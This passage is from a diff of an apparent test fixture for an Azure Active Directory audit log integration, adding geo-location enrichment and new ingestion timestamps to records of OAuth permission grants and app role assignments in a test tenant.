"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -10378,6 +11026,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -10544,7 +11204,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125160100Z", + "ingested": "2021-12-14T14:48:43.176716648Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -10571,6 +11231,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -10737,7 +11409,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125163800Z", + "ingested": "2021-12-14T14:48:43.176717512Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -10764,6 +11436,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -10930,7 +11614,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125169100Z", + "ingested": "2021-12-14T14:48:43.176718076Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -10957,6 +11641,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -11123,7 +11819,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125175700Z", + "ingested": "2021-12-14T14:48:43.176718821Z", "original": 